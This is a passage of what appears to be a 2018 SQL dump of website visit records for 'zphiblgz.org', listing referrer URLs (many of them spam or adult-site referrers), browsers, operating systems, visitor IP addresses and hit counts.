ages%2Fsearch%3Bimages%3B%3B&text=&etext=1845.fpOMVPBJw-1rR9l7TWxsI5nctwH4G37qgGAfg313niI.298ee3c5b6b69b3fb8f34118d8e02b4a398dd2e9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MXJXaUthSkNqN095RmF3SXNNd2tHRW13Nk9zam9aU1BETXR3MnAxWUh1Zyws&sign=90524c9e091d392aaa1d63cbf062d04c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.86','000',2,0),(33023,'2018-07-11','http://modnie-futbolki.net/','Opera','Windows','8.01','','46.119.125.180','000',2,0),(33024,'2018-07-11','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(33025,'2018-07-11','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(33026,'2018-07-11','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','206.180.165.147','000',2,0),(33027,'2018-07-11','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.173','000',1,0),(33028,'2018-07-11','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',2,0),(33029,'2018-07-11','http://sladkoevideo.com/','Unknown','Unknown','Unknown','','46.119.125.180','000',2,0),(33030,'2018-07-11','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.166.139','000',1,0),(33031,'2018-07-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(33032,'2018-07-11','https://zphiblgz.org','Firefox','Windows','40.1','','78.84.116.195','000',2,0),(33033,'2018-07-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(33034,'2018-07-11','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(33035,'2018-07-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(33036,'2018-07-11','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','144.76.102.243','000',3,0),(33037,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','6.0.2','','144.76.102.243','000',1,0),(33038,'2018-07-11','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','144.76.102.243','000',1,0),(33039,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','5.1.7','','144.76.102.243','000',2,0),(33040,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','11.0.1','','144.76.102.243','000',1,0),(33041,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','5.1.8','','144.76.102.243','000',1,0),(33042,'2018-07-11','https://zphiblgz.org','Chrome','Linux','63.0.3239.84','','144.76.102.243','000',1,0),(33043,'2018-07-11','https://zphiblgz.org','Chrome','Windows','43.0.2357.134','','144.76.102.243','000',2,0),(33044,'2018-07-11','https://zphiblgz.org','MSIE','Windows','10.0','','144.76.102.243','000',2,0),(33045,'2018-07-11','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','144.76.102.243','000',1,0),(33046,'2018-07-11','https://zphiblgz.org','Firefox','Macintosh','58.0','','144.76.102.243','000',3,0),(33047,'2018-07-11','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','144.76.102.243','000',2,0),(33048,'2018-07-11','https://zphiblgz.org','Firefox','Windows','57.0','','144.76.102.243','000',1,0),(33049,'2018-07-11','https://zphiblgz.org','Firefox','Windows','58.0','','144.76.102.243','000',1,0),(33050,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','11.0.2','','144.76.102.243','000',2,0),(33051,'2018-07-11','https://zphiblgz.org','MSIE','Windows','11.0','','144.76.102.243','000',1,0),(33052,'2018-07-11','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(33053,'2018-07-11','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','193.169.252.46','000',3,0),(33054,'2018-07-11','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.207.7.214','000',1,0),(33055,'2018-07-11','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(33056,'2018-07-11','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(33057,'2018-07-11','https://zphiblgz.org','Firefox','Windows','40.1','','39.53.124.128','000',2,0),(33058,'2018-07-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(33059,'2018-07-11','http://udav.net/','MSIE','Windows','7.0b','','37.229.254.233','000',3,0),(33060,'2018-07-11','https://moinozhki.com/','MSIE','Windows','6.0','','37.229.254.170','000',2,0),(33061,'2018-07-11','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.17.193','000',2,0),(33062,'2018-07-12','https://zphiblgz.org','Firefox','Macintosh','59.0','','64.246.165.180','000',2,0),(33063,'2018-07-12','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(33064,'2018-07-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(33065,'2018-07-12','https://zphiblgz.org','Chrome','Windows','32.0.1667.0','','165.227.45.181','000',2,0),(33066,'2018-07-12','https://zphiblgz.org','Chrome','Linux','41.0.2227.0','','165.227.45.181','000',2,0),(33067,'2018-07-12','https://zphiblgz.org','Chrome','NetBSD','27.0.1453.116','','165.227.45.181','000',1,0),(33068,'2018-07-12','https://zphiblgz.org','Chrome','Windows','31.0.1650.16','','165.227.45.181','000',2,0),(33069,'2018-07-12','http://moneyzzz.ru/','MSIE','Windows','6.0','','37.229.254.170','000',2,0),(33070,'2018-07-12','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.28','000',1,0),(33071,'2018-07-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(33072,'2018-07-12','http://ukrainian-poetry.com/','MSIE','Windows','6.0','','178.137.16.67','000',3,0),(33073,'2018-07-12','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','166.62.126.3','000',2,0),(33074,'2018-07-12','zphiblgz.org','Chrome','Windows','58.0.1145.75','','166.62.33.164','000',1,0),(33075,'2018-07-12','zphiblgz.org','Chrome','Windows','58.0.1145.75','','209.141.54.221','000',1,0),(33076,'2018-07-12','zphiblgz.org','Chrome','Windows','58.0.1145.75','','50.63.160.72','000',3,0),(33077,'2018-07-12','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(33078,'2018-07-12','http://metallosajding.ru/','Opera','Windows','7.54','','178.137.86.234','000',1,0),(33079,'2018-07-12','https://ww2awards.info/','MSIE','Windows','6.0','','37.229.254.233','000',3,0),(33080,'2018-07-12','https://zphiblgz.org','Firefox','Windows','57.0','','144.76.102.243','000',1,0),(33081,'2018-07-12','https://zphiblgz.org/','Firefox','Windows','33.1','','149.202.86.188','000',2,0),(33082,'2018-07-12','https://zphiblgz.org','Safari','iPhone','9.0','','175.42.1.192','000',1,0),(33083,'2018-07-12','https://zphiblgz.org','Safari','iPhone','9.0','','180.95.216.55','000',1,0),(33084,'2018-07-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1846.auU4lt1_xB5UtdnNHzlnAigntbX4ScsirTefthGF43o.3e20fa5e1cdc8e97bbf9cede0ba24813b796af0e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041bTJGa2RpQUdxQkpzMjVEMFZqamFpdXk1YlhDc2d4MEZYVnJ0TWhrcXZrUSws&sign=6a86365ec206166d97cef4159871f79f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','108.61.221.15','000',2,0),(33085,'2018-07-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1846.Q6y9d2GMvJTxekNPKfv2NykKRnEqunzRlD9ZGqNQSNU.448a875a50010a48f19cb991fc8a6df55b732383&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YWNNazVmWW15T01zOEhhOTBvX1IzWVREc09KT3ZhOXdQWnZnVVJ6V1hZdyws&sign=4eb9b6175de2428d245657cdaced7694&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.145.143','000',2,0),(33086,'2018-07-12','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(33087,'2018-07-12','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(33088,'2018-07-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1846.Ai3YT80hUe-C8OTJe8gCHAPdi1ukhc4cchf0IbvcgW8.e7230540c8f107875376f85e8989e1ee77f6ab03&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MmtDazJpSFhBUThPblEzWWZDandhQTRfVmZ5enoxNnlsUU96U0diUlVadyws&sign=46c90d52bbebe7ed0a831e5e54b64f0b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.16.245','000',2,0),(33089,'2018-07-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1846.fB6i30m59xsSj3vvLsmASUkztncb8AN7Dw0AFkpDjQ8.da954d6956ec3c6c82292d71a01ae9c3d477d749&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043RnpGVmg1QnR0a0lyMlR0Umd1T3BFOFdfZUlVYU5CcEhHTXowMDhfcEh2QSws&sign=9c29a313ee55e2e7f8fa9d5c3e1f218b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.86','000',2,0),(33090,'2018-07-12','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1846.Da6kB8zacVDeboUWaqx0EDnmmA2-sf3RRsd5Nu_T8xk.841d4067d3bb254e90b347cf47de02da8e9acc1f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040QVVXU28zN1lCZVhKdDhTVUxTZWtKaVpMRlh4UlUxb1pncmRZTVZmdXFTdyws&sign=83bc0542f3aa475ed5d9b14df299b2d4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.20.194','000',2,0),(33091,'2018-07-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(33092,'2018-07-12','https://zphiblgz.org','Firefox','Windows','40.1','','103.102.157.175','000',2,0),(33093,'2018-07-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.120.176.171','000',3,0),(33094,'2018-07-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(33095,'2018-07-12','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','3.6.8','','89.234.68.77','000',10,0),(33096,'2018-07-12','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(33097,'2018-07-12','http://moneyzzz.ru/','MSIE','Windows','6.0','','178.137.160.220','000',3,0),(33098,'2018-07-12','https://zphiblgz.org','MSIE','Windows','11.0','','74.93.209.225','000',7,0),(33099,'2018-07-12','https://www.google.com/','Chrome','Windows','67.0.3396.99','','71.244.153.151','000',2,0),(33100,'2018-07-12','https://zphiblgz.org','Firefox','Windows','57.0','','209.163.119.104','000',2,0),(33101,'2018-07-12','https://zphiblgz.org/','Firefox','Windows','57.0','','209.251.21.164','000',1,0),(33102,'2018-07-12','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33103,'2018-07-12','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.220.101.34','000',1,0),(33104,'2018-07-12','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(33105,'2018-07-12','http://xn----ctbigni3aj4h.xn--p1ai/','Opera','Windows','9.00','','178.137.160.220','000',2,0),(33106,'2018-07-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(33107,'2018-07-12','https://hyip-zanoza.me/','MSIE','Windows','6.0','','46.119.125.180','000',2,0),(33108,'2018-07-12','https://ww2awards.info/','MSIE','Windows','5.5','','178.137.86.234','000',1,0),(33109,'2018-07-12','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(33110,'2018-07-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(33111,'2018-07-12','https://zphiblgz.org','Python-urllib','Unknown','2.7','','54.169.216.120','000',2,0),(33112,'2018-07-12','http://udav.net/','MSIE','Windows','6.0','','178.137.86.234','000',3,0),(33113,'2018-07-12','http://xn-----7kcaaxchbbmgncr7chzy0k0hk.xn--p1ai/','MSIE','Windows','5.5','','178.137.16.67','000',6,0),(33114,'2018-07-12','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(33115,'2018-07-12','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.35','000',1,0),(33116,'2018-07-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.35','000',1,0),(33117,'2018-07-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(33118,'2018-07-12','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',2,0),(33119,'2018-07-12','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','5.5','','37.229.254.233','000',3,0),(33120,'2018-07-12','http://xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai/','MSIE','Windows','6.0','','178.159.37.70','000',3,0),(33121,'2018-07-12','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.35','000',1,0),(33122,'2018-07-13','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.228.166','000',2,0),(33123,'2018-07-13','https://zphiblgz.org','Firefox','Windows','40.1','','111.94.144.106','000',2,0),(33124,'2018-07-13','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(33125,'2018-07-13','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.127.103','000',1,0),(33126,'2018-07-13','https://zphiblgz.org','Firefox','Windows','52.0','','92.222.39.223','000',2,0),(33127,'2018-07-13','https://infektsii.com/','MSIE','Windows','6.0','','46.119.125.180','000',6,0),(33128,'2018-07-13','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.162','000',1,0),(33129,'2018-07-13','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(33130,'2018-07-13','https://allergija.com/','Opera','Windows','9.00','','178.137.86.234','000',2,0),(33131,'2018-07-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1847.y7o8pYpZPfcupvOX58tCVbKrqodzPnwu4cwa7rZWuhk.439b833b34076a3ac4cd44ac331df9683cddce25&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Sm40MnR5RmlSMXVWTnVoVE9SSVV3RWhBZ3ltYU5nSkdWUTA2aW1JR2d2QSws&sign=500017de693e553192a0605ad1e55349&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(33132,'2018-07-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1847.UxhZHmWm5EkTJ_H8SEMEqYJFSe5spdre9rZGHehNX0w.63dfa9f6c6faccfd57be14944418b2bbd2c195fb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Nk5iNTNNamhaVlR2eTlRZ3E0UjJzTmJnby1TcVFORFNJWWdGaHpfN0J4USws&sign=a9c400eac16014f26f23153e98afac69&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','164.132.137.175','000',2,0),(33133,'2018-07-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1847.psLZhwLgKM3FbQ48-Fdy-woAsb2NyCE697nCOfB5R5I.e73d073a28222e84b0501618ae28967023506505&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040WS1XWWJoTFlVUVJ6aEd1d3ZzcDFCRkdhZmZhZE9NSnBMVkU4cGVwdWFTUSws&sign=0128a6e37282a89a144abb9a1d75ee9e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.186','000',2,0),(33134,'2018-07-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1847.x0FQhPacdIK9wsc99pfXoSP_fK3OOzx9tPp-Sx7xRww.5e15b0bc8b25d975e9820e946cef4b7c43e0d199&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QWxGaXlnZXZId1BmVVN6dzN5a0R0eUlGODV2ZUNrclhJb3ZOT2lOaGlTZyws&sign=bde59990c18d31e4cbc44c6df59b9afa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.202.225.109','000',2,0),(33135,'2018-07-13','http://technika-remont.ru/','Opera','Windows','6.01','','37.229.254.233','000',3,0),(33136,'2018-07-13','https://zphiblgz.org/','Firefox','Windows','57.0','','31.207.7.25','000',1,0),(33137,'2018-07-13','https://rent2spb.ru/','MSIE','Windows','4.01','','178.137.160.220','000',2,0),(33138,'2018-07-13','https://zphiblgz.org','MSIE','Windows','11.0','','192.95.30.29','000',2,0),(33139,'2018-07-13','https://dawlenie.com/','MSIE','Windows','6.0','','37.229.254.170','000',4,0),(33140,'2018-07-13','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(33141,'2018-07-13','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(33142,'2018-07-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(33143,'2018-07-13','http://prostitutki-rostova.ru.com/','MSIE','Windows','6.0','','178.137.160.220','000',2,0),(33144,'2018-07-13','https://zphiblgz.org','Firefox','Windows','3.0','','169.61.157.77','000',1,0),(33145,'2018-07-13','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.28','000',1,0),(33146,'2018-07-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(33147,'2018-07-13','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(33148,'2018-07-13','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(33149,'2018-07-13','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(33150,'2018-07-13','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(33151,'2018-07-13','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(33152,'2018-07-13','https://zphiblgz.org','Firefox','Windows','40.1','','185.253.98.164','000',2,0),(33153,'2018-07-13','https://zphiblgz.org','Firefox','Windows','40.1','','175.138.244.44','000',2,0),(33154,'2018-07-13','https://www.google.com/','Chrome','Windows','67.0.3396.87','','73.43.199.134','000',2,0),(33155,'2018-07-13','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(33156,'2018-07-13','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',2,0),(33157,'2018-07-13','http://zphiblgz.org/','MSIE','Windows','11.0','','94.46.177.142','000',1,0),(33158,'2018-07-13','http://rusochineniya.ru/','MSIE','Windows','6.0','','178.137.16.67','000',1,0),(33159,'2018-07-13','https://www.souvenirua.com/uk/','Unknown','Unknown','Unknown','','46.119.125.180','000',2,0),(33160,'2018-07-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.237.242.66','000',4,0),(33161,'2018-07-14','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.79.169.169','000',2,0),(33162,'2018-07-14','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(33163,'2018-07-14','http://mobile.regionshop.biz/','MSIE','Windows','5.5','','178.137.86.234','000',1,0),(33164,'2018-07-14','https://zphiblgz.org/','Firefox','Windows','43.0','','149.202.86.188','000',2,0),(33165,'2018-07-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','35.187.7.156','000',25,0),(33166,'2018-07-14','https://luckybull.io/','MSIE','Windows','6.0','','178.137.86.234','000',2,0),(33167,'2018-07-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1848.04h3JA3DFVTqN6FsyQNWlzV2vyuYp5gmVIN3HWRQwFI.9263a74d97e18eb5f686642ad9872117cf9a82f8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043aTlJb0dmLUZseUdhMmZERjFZUFNTTDNIZmlsS0ZXWG5GQmdFTHhaTXcwQSws&sign=4c6a4ec42dc03bdc58c4ab5e6b5400d8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(33168,'2018-07-14','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.196','000',1,0),(33169,'2018-07-14','http://technika-remont.ru/','MSIE','Windows','2.0d','','37.229.254.233','000',3,0),(33170,'2018-07-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1848.9eAb6QkjVh6yumtd_KtrnmGypt1J_uQmE2V_15Ukh28.7947c49f9b190af7c66e8511982644b5b841353e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043WldoclRUdFZHdWhWWG1DNExIbURKb1U0WXFFR1hUWmdRckFBckFUMWJhdyws&sign=c6872215752b172dc6b1fc1820c6e598&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.37','000',2,0),(33171,'2018-07-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1848.apJYs-B1-lPX9D-sWR-zn8LdTg_ZdfJEEwrJqgwBbG4.aaa6d8e74dc735827c465af69f9bf7b8c536cd3c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dk9lNFBEVGdzTkJXYXI0WFBVcDZKSi1xSkRuN01UeVRfb3V2S0hNU0hPQSws&sign=0fc2f4b4ee9d6327051f2088b35cd785&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.101.105','000',2,0),(33172,'2018-07-14','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.8.44','000',1,0),(33173,'2018-07-14','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.83.44','000',1,0),(33174,'2018-07-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(33175,'2018-07-14','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(33176,'2018-07-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',2,0),(33177,'2018-07-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(33178,'2018-07-14','http://computer-remont.ru/','MSIE','Windows','5.5','','37.229.254.233','000',3,0),(33179,'2018-07-14','https://zphiblgz.org','Chrome','Macintosh','55.0.2921.82','','104.144.161.106','000',1,0),(33180,'2018-07-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(33181,'2018-07-14','https://rent2spb.ru/','MSIE','Windows','5.5','','178.137.160.220','000',1,0),(33182,'2018-07-14','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(33183,'2018-07-14','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(33184,'2018-07-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.60.100.243','000',6,0),(33185,'2018-07-14','http://hard-porn.mobi/','Opera','Windows','7.0','','178.137.16.67','000',1,0),(33186,'2018-07-14','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(33187,'2018-07-14','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(33188,'2018-07-14','http://zphiblgz.org','Safari','Macintosh','10.1','','62.210.167.118','000',2,0),(33189,'2018-07-14','http://porno-chaman.info/','MSIE','Windows','6.0','','178.137.160.220','000',2,0),(33190,'2018-07-14','http://skinali.photo-clip.ru/','MSIE','Windows','6.0','','178.137.16.67','000',2,0),(33191,'2018-07-14','http://zphiblgz.org/','Firefox','Windows','57.0','','89.28.24.190','000',2,0),(33192,'2018-07-14','https://zphiblgz.org','Firefox','Windows','40.1','','112.200.97.229','000',2,0),(33193,'2018-07-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(33194,'2018-07-14','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(33195,'2018-07-15','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','176.58.108.121','000',2,0),(33196,'2018-07-15','https://hyip-zanoza.me/','MSIE','Windows','6.0','','46.119.125.180','000',6,0),(33197,'2018-07-15','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(33198,'2018-07-15','https://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',2,0),(33199,'2018-07-15','https://zphiblgz.org','Firefox','Windows','40.1','','112.210.185.226','000',2,0),(33200,'2018-07-15','https://xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks/','MSIE','Windows','2.0','','178.137.160.220','000',2,0),(33201,'2018-07-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1849.8hTPjZnTa5ChH0lVIdm71y_j7P-WPDl20LxvT2631Jg.2af1d1b113a39e1ad638f255d4aa9b936dc9f0be&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dXQyZHYwMzRCUTdZSWRqakFrNEVQQVV3UTYyNnZXMG9TT1BGUnJpWDlCUSws&sign=8371345f01ef51b1a421c179c03e9c01&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.212.140','000',2,0),(33202,'2018-07-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2F